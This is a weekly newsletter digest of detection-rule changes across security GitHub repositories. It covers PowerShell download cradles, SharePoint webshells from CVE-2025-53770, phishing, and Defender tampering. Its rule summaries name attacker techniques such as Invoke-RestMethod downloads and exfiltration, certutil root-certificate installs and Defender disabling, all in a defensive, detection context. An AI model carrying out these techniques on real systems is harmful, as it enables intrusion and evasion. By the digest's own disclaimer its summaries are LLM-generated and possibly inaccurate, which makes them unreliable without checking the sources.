This week's update highlights the most significant changes to detection rules from 10 of the 40+ monitored GitHub repositories. Between Jul 28 and Aug 4, 2025, contributors added 36 new rules and updated 97 existing ones.

Stay informed about the latest changes in detection engineering to improve your threat detection coverage and operational efficiency.

Key Takeaways

• Multiple rules in Sigma and Hayabusa were updated to detect the Invoke-RestMethod cmdlet and its irm alias. This change expands coverage for PowerShell-based payload downloads, C2 communication, and persistence methods. The updates apply to both process creation and script block log events. (SigmaHQ/sigma, Yamato-Security/hayabusa-rules)

• Detections for SharePoint exploitation were added across multiple repositories. New rules target webshell creation linked to CVE-2025-49704 and CVE-2025-53770 by monitoring file creation events. A separate Elastic rule finds unusual access to web.config files, another key post-exploitation indicator for these vulnerabilities. (SigmaHQ/sigma, elastic/detection-rules, Yamato-Security/hayabusa-rules)

• Phishing detection was expanded with a focus on novel delivery and improved accuracy. New rules from Sublime target callback phishing that uses legitimate services like Microsoft and Signable. Other rules now detect malicious files dropped in Outlook temporary directories and use refined logic for quishing and brand impersonation. (sublime-security/sublime-rules, SigmaHQ/sigma)

• The protections-artifacts repository received significant updates for Windows threats. New YARA rules detect the NovaBlight infostealer, Shellter trojan, and multiple Cobalt Strike modules. Numerous behavioral rules for in-memory attacks, including direct syscalls and ROP gadgets, were refined with new exclusions to reduce false positives from legitimate software. (elastic/protections-artifacts)

• New rules target adversary attempts to disable endpoint defenses and erase forensic evidence. Hayabusa added multiple detections for blinding Windows Defender via PowerShell, registry edits, and ETW manipulation. Other new detections identify tampering with forensic artifacts like Amcache.hve and the installation of rogue root certificates with certutil. (Yamato-Security/hayabusa-rules, Sergio-Albea-Git/Threat-Hunting-KQL-Queries, anvilogic-forge/armory)

🤖 Put this intel to work

All indicators and detection rules from this digest are available via our MISP and STIX/TAXII feeds.

Pipe them directly into your SIEM, SOAR, or TIP to automate detection and enrichment.

Learn more about the feeds

Table Of Contents

• Corporate repositories (8)

  • SigmaHQ/sigma (+3, ✎14)

  • sublime-security/sublime-rules (+4, ✎10)

  • elastic/detection-rules (+7, ✎1)

  • elastic/protections-artifacts (+2, ✎53)

  • anvilogic-forge/armory (+3)

  • splunk/security_content (+1)

  • chainguard-dev/osquery-defense-kit (✎1)

  • Yamato-Security/hayabusa-rules (+14, ✎18)

• Personal repositories (2)

  • Sergio-Albea-Git/Threat-Hunting-KQL-Queries (+1)

  • Cloud-Architekt/AzureSentinel (+1)

• Feedback

• Disclaimer

• Powered by

Corporate repositories (8)

SigmaHQ/sigma (+3, ✎14)

+ New rules

Two new rules target adversary persistence on Windows. One detects web shell creation in SharePoint directories, a post-exploitation action following vulnerabilities like CVE-2025-49704. The other identifies the use of wmic.exe to set a user account password to never expire. (Suspicious File Write to SharePoint Layouts Directory, Password Set to Never Expire via WMI)

A new rule detects the opening of malicious attachments from phishing emails. It monitors for the creation of files with high-risk extensions, such as .cpl, .hta, and .iso, within Microsoft Outlook's temporary directories. (Suspicious File Created in Outlook Temporary Directory)

✎ Modified rules

Multiple rules targeting malicious PowerShell activity were updated to detect the Invoke-RestMethod cmdlet and its common alias irm. This change broadens coverage for various adversary techniques, including payload downloads, data exfiltration, persistence via registry run keys, and C2 communication. (Potential DLL File Download Via PowerShell Invoke-WebRequest, Suspicious Invoke-WebRequest Execution With DirectIP, PowerShell Script With File Upload Capabilities, Change User Agents with WebRequest, Suspicious PowerShell In Registry Run Keys, Potential Data Exfiltration Activity Via CommandLine Tools, Usage Of Web Request Commands And Cmdlets - ScriptBlock, Usage Of Web Request Commands And Cmdlets, PowerShell Download and Execution Cradles, Obfuscated IP Download Activity)

Detection for SharePoint RCE vulnerability CVE-2025-53770 was improved by targeting more specific malicious filenames, such as spinstall.aspx and debug_dev.js. The logic now requires file creation within known SharePoint installation paths, increasing detection accuracy for post-exploitation activity. (Potential SharePoint ToolShell CVE-2025-53770 Exploitation - File Create)

Two rules detecting the abuse of tunneling services, ngrok and Visual Studio Code tunnels, were updated for better MITRE ATT&CK framework alignment. Both rules now include mappings to T1572 (Protocol Tunneling) to more accurately categorize this command and control technique. (Process Initiated Network Connection To Ngrok Domain, Network Connection Initiated To Visual Studio Code Tunnels Domain)

The rule for detecting malicious double-extension files was updated to include additional patterns. It now recognizes .svg as a final extension and adds .rtf and .txt as decoy extensions to better identify files disguised as documents or images. (Suspicious Double Extension Files)

sublime-security/sublime-rules (+4, ✎10)

+ New rules

Two new rules detect callback phishing attempts delivered through legitimate services. One rule identifies scams sent from Microsoft infrastructure, and another targets fraudulent Signable e-signature requests. Both detections search for specific keywords related to payments or support, alongside a phone number, within the message body. (Callback Phishing via Signable E-Signature Request, Callback Phishing via Microsoftonline comment)

A new rule detects GoDaddy brand impersonation. It analyzes inbound emails for sender display names or domains containing 'godaddy' that do not originate from the official, DMARC-passing 'godaddy.com' domain. (Brand Impersonation: GoDaddy)

A new rule flags inbound emails that contain links to .onion domains. The detection applies to messages from untrusted senders or those that fail DMARC, identifying communications directing users to the Tor anonymization network. (Link: .onion From Unsolicited Sender)

✎ Modified rules

Multiple rules for QR code-based phishing (quishing) were updated. The changes standardize sender reputation analysis to use the specific sender email address for more precise profiling. DMARC validation logic was also hardened across these rules to improve accuracy and prevent evaluation errors. (Attachment: QR code with credential phishing indicators, Link: QR code with phishing disposition in img or pdf, QR Code with suspicious indicators)

Detection for brand impersonation attacks targeting Zoom, Booking.com, and Microsoft was updated. The changes broaden coverage by including new link domains, adding sender display name checks, and using more flexible keyword matching. False positives from Microsoft impersonation are reduced by adding exclusions for newsletters. (Brand Impersonation: Zoom, Brand Impersonation: Booking.com, Brand impersonation: Microsoft)

Several rules targeting specific social engineering tactics were updated. Coverage for HR-themed phishing lures was broadened to include PDFs and additional keywords. Detection for 'secure message' credential phishing now scans the full email thread. Extortion detection was tuned to reduce false positives from trusted senders. (Attachment: Suspicious Employee Policy Update Document Lure, Credential phishing: 'Secure message' and engaging language, Extortion / sextortion (untrusted sender))

elastic/detection-rules (+7, ✎1)

+ New rules

A new set of rules promotes alerts from multiple third-party security platforms into Elastic. These rules query the respective alert indices for SentinelOne, Microsoft Sentinel, Google SecOps, CrowdStrike, Splunk, and Elastic Security itself, centralizing alert triage within the Elastic Security application. (SentinelOne External Alerts, Microsoft Sentinel External Alerts, Google SecOps External Alerts, Elastic Security External Alerts, CrowdStrike External Alerts, Splunk External Alerts)

A new rule detects unusual first-time access to web.config files on Windows within a 7-day window. This behavior is associated with harvesting credentials and configuration data and is linked to CVE-2025-49704, CVE-2025-49706, and CVE-2025-53770. (Unusual Web Config File Access)

✎ Modified rules

Detection for Microsoft Entra ID MFA brute-force attacks is refined. The rule now requires a high count of failed TOTP attempts from at least 10 distinct sessions for a single user, providing a more specific pattern for programmatic attacks. Coverage is expanded by including an additional failure error code (500121). (Microsoft Entra ID MFA TOTP Brute Force Attempts)

elastic/protections-artifacts (+2, ✎53)

+ New rules

Two new YARA rules add detection for specific Windows malware families. One rule identifies the NovaBlight infostealer by matching a hardcoded file path and status messages in memory or files. The second rule detects the Windows.Trojan.Shellter by identifying characteristic byte patterns associated with its API hashing and memory manipulation routines. (Windows_Infostealer_NovaBlight_b80703b9, Windows_Trojan_Shellter_89e693fc)

✎ Modified rules

Multiple rules for detecting keylogging and credential access on Windows were updated. These rules monitor for suspicious use of Windows APIs like SetWindowsHookEx, RegisterRawInputDevices, and DirectInput, as well as access to Credential Manager files. The changes primarily add new file hash and path exclusions to reduce false positives from legitimate applications. (Keystrokes Input Capture from Suspicious CallStack, Keystroke Messages Hooking via SetWindowsHookEx, Keystrokes Input Capture from Unsigned DLL, Potential Discovery of Windows Credential Manager Store, Keystroke Input Capture via RegisterRawInputDevices, Keystroke Input Capture via DirectInput)

New and updated YARA rules provide detection for specific malware and offensive tools. Coverage now includes multiple Cobalt Strike modules like its keylogger, UAC bypass, and getsystem functions, with a refinement to a shellcode pattern. Additional rules detect the Camelot cryptominer on Linux and malware signed with known malicious certificates. (Windows_Generic_MalCert_024569d4, Linux_Cryptominer_Camelot_29c1c386, Windows_Trojan_CobaltStrike_1787eef5)

Detection logic for sophisticated in-memory threats on Windows was refined across numerous rules. These rules identify techniques like direct system calls, ROP gadgets, call stack spoofing, shellcode injection from Python or PowerShell, and exception-handler-based injection. Updates focus on adding granular exclusions for call stack patterns, module hashes, and specific API call parameters to improve accuracy. (Execution from Suspicious Stack Trailing Bytes, API Call via Jump ROP Gadget, Direct Syscall from Unsigned Module, Remote Process Injection via Python, Shellcode Injection from Mounted Device, Shellcode Injection via PowerShell, Windows API Call via Indirect Random Syscall, Potential Process Creation via Direct Syscall, Library Loaded From a Potentially Altered Call Stack, Suspicious NTDLL Memory Write, VirtualProtect via Vectored Exception Handling, Suspicious VirtualProtect via Jscript9 from Internet Explorer)

Rules that detect defense evasion by abusing legitimate Windows components were tuned. This includes monitoring for anomalous child processes of the Task Scheduler and WMI, misuse of script interpreters, renamed automation tools, and parent process ID spoofing. Updates also broaden detection for Elastic agent tampering via PendingFileRenameOperations and add exclusions to the rule for HVCI disabling. Most changes filter out benign administrative and software behavior. (Privilege Escalation via EXTENDED STARTUPINFO, Potential Elastic Tampering via PendingFileRename, Suspicious Windows Script Interpreter Child Process, Suspicious Parent-Child Relationship, Disabling Hypervisor-protected Code Integrity via Registry, Script Execution via Microsoft HTML Application, Suspicious Cmd Execution via WMI, Oversized DLL Creation followed by SideLoad, Suspicious Windows Schedule Child Process, Execution via Windows Command Line Debugging Utility, Network Connection via Process with Unusual Arguments, Renamed Windows Automaton Script Interpreter)

Detection for various initial access and execution techniques was improved. This includes updates to rules that find malicious Office documents spawning PowerShell, command execution from IIS web shells, RDP tunneling, and user-tricked execution via Run or browser dialogs. On macOS, detection for large OSA script execution was broadened. Updates primarily add exclusions for legitimate software and system workflows to reduce noise. (Suspicious Command Shell Execution via Windows Run, Potential Remote Desktop Protocol Tunneling, Suspicious Browser Preferences File Modification, PowerShell Obfuscation Spawned via Microsoft Office, Suspicious Microsoft IIS Worker Descendant, Potential Execution via Clickfix Phishing, Unusually large OSA script execution via Shell Command, Potential Decoy Document via User Execution)

anvilogic-forge/armory (+3)

+ New rules

Two new rules detect root certificate installation using certutil.exe. They monitor for the -addstore command-line argument in process creation events, identifying a technique used to subvert trust controls for man-in-the-middle attacks. (Certutil Root Certificate Install, Certutil Root Certificate Install)

A new rule detects the addition of a member to a security-enabled global group in Active Directory. It monitors Windows Event IDs 4728 and 632 to find potential privilege escalation or persistence attempts. (Member added to security-enabled global group)

splunk/security_content (+1)

+ New rules

A new rule detects rundll32.exe loading a DLL from a temporary directory path. This is a common defense evasion technique where adversaries stage payloads. The detection uses Splunk process creation data (Sysmon EventID 1) to find these executions. (Windows Rundll32 Load DLL in Temp Dir)

chainguard-dev/osquery-defense-kit (✎1)

✎ Modified rules

An OSQuery rule that detects potential command-and-control activity by monitoring for anomalous DNS requests was updated to reduce false positives. The change expands an IP-based exclusion for GitHub to a wider CIDR block and adds several common developer and cloud applications to the process name exclusion list. (Catch DNS traffic going to machines other than the host-configured DNS server (event-based))

Yamato-Security/hayabusa-rules (+14, ✎18)

+ New rules

Multiple new rules detect defense evasion techniques that target Windows Defender. Detections cover disabling threat responses via PowerShell's Set-MpPreference or direct registry changes, blinding monitoring by disabling Defender's ETW logging with reg.exe, and impairing manual scans by deleting the product's context menu registry keys. The rules use process creation and registry event telemetry. (PowerShell Defender Threat Severity Default Action Set to 'Allow' or 'NoAction', Disabling Windows Defender WMI Autologger Session via Reg.exe, Windows Defender Context Menu Removed, Windows Defender Threat Severity Default Action Modified, PowerShell Defender Threat Severity Default Action Set to 'Allow' or 'NoAction', Windows Defender Context Menu Removed, Disabling Windows Defender WMI Autologger Session via Reg.exe, Delete Defender Scan ShellEx Context Menu Registry Key, Windows Defender Threat Severity Default Action Modified)

Two new rules detect webshell deployment on Microsoft SharePoint servers by monitoring Sysmon file creation events. One rule targets generic webshell extensions like .aspx and .php created by suspicious processes, while the other identifies specific files associated with the exploitation of CVE-2025-53770. (Suspicious File Write to SharePoint Layouts Directory, Potential SharePoint ToolShell CVE-2025-53770 Exploitation - File Create)

Two new rules detect a persistence technique where an adversary uses the WMIC utility to set a user account's password to never expire. The detection logic is based on monitoring process creation events for wmic.exe with specific command-line arguments. (Password Set to Never Expire via WMI, Password Set to Never Expire via WMI)

A new rule detects potential initial access from malicious email attachments. It monitors Sysmon for the creation of files with high-risk extensions, such as .hta, .iso, or .vbs, in Microsoft Outlook's temporary attachment folders. (Suspicious File Created in Outlook Temporary Directory)

✎ Modified rules

Detection coverage for malicious PowerShell activity is updated across sixteen rules. The primary change adds the Invoke-RestMethod cmdlet and its irm alias to logic that detects download cradles, data exfiltration, persistence, and DLL downloads. Several of these rules also now monitor powershell_ise.exe as a source process. (Suspicious PowerShell In Registry Run Keys, Usage Of Web Request Commands And Cmdlets - ScriptBlock, PowerShell Download and Execution Cradles, Potential DLL File Download Via PowerShell Invoke-WebRequest, Suspicious Invoke-WebRequest Execution With DirectIP, Suspicious Invoke-WebRequest Execution, Change User Agents with WebRequest, PowerShell Script With File Upload Capabilities, Potential Data Exfiltration Activity Via CommandLine Tools, Obfuscated IP Download Activity, Usage Of Web Request Commands And Cmdlets, PowerShell Download and Execution Cradles, Potential DLL File Download Via PowerShell Invoke-WebRequest, Obfuscated IP Download Activity, Suspicious Invoke-WebRequest Execution With DirectIP, Potential Data Exfiltration Activity Via CommandLine Tools)

Detection for malicious files disguised with double extensions is updated. The rule now identifies .svg as a final extension and adds deceptive inner extensions like .rtf. and .txt., in response to recent phishing campaigns. (Suspicious Double Extension Files)

The rule for detecting malicious use of Visual Studio Code remote tunnels received updated MITRE ATT&CK mappings. The change adds classifications for Command and Control (TA0011) and Protocol Tunneling (T1572), providing better context for alerts about this exfiltration and C2 technique. (Network Connection Initiated To Visual Studio Code Tunnels Domain)

Cyber OSINT Overview is a free weekly newsletter by CTIChef.com that summarizes updates from 80+ sources (government orgs, cybersecurity vendors, threat intel teams, security researchers, and cybersecurity communities) into one overview.

Read the latest issue

Personal repositories (2)

Sergio-Albea-Git/Threat-Hunting-KQL-Queries (+1)

+ New rules

A new rule detects defense evasion attempts through the modification or deletion of Windows forensic artifacts. It monitors file events targeting Amcache.hve and the SYSTEM hive, which contain program and execution history, to identify adversaries trying to erase their tracks from a system. (Detect Attempts to modify Amcache.hve or SYSTEM files)

Cloud-Architekt/AzureSentinel (+1)

+ New rules

A new KQL function, UnifiedMicrosoftGraphLogs, was added to normalize log data from the GraphAPIAuditEvents table to match the schema of MicrosoftGraphActivityLogs. This allows analysts to query a unified dataset for Microsoft Graph API activity, simplifying investigations. (UnifiedMicrosoftGraphLogs)

Fill in our detection rules usage survey

Feedback

Your input helps us improve! If you spot any issues, mistakes, or omissions in this digest issue, or have any other suggestions, we'd love to hear from you. Contact us at team@rulecheck.io - we value your feedback and are committed to improving the content we produce.

Disclaimer

The summaries in this brief are generated by LLM model based on the provided system and user prompts. While every effort is made to consolidate accurate and relevant insights, the model may occasionally misinterpret, misrepresent, or hallucinate information. Readers are strongly advised to verify all key points by consulting the original sources linked in the brief for complete context and accuracy.

Powered by

This digest is built with BlackStork.

Looking for a customized version of this newsletter? We'd be happy to help — contact us.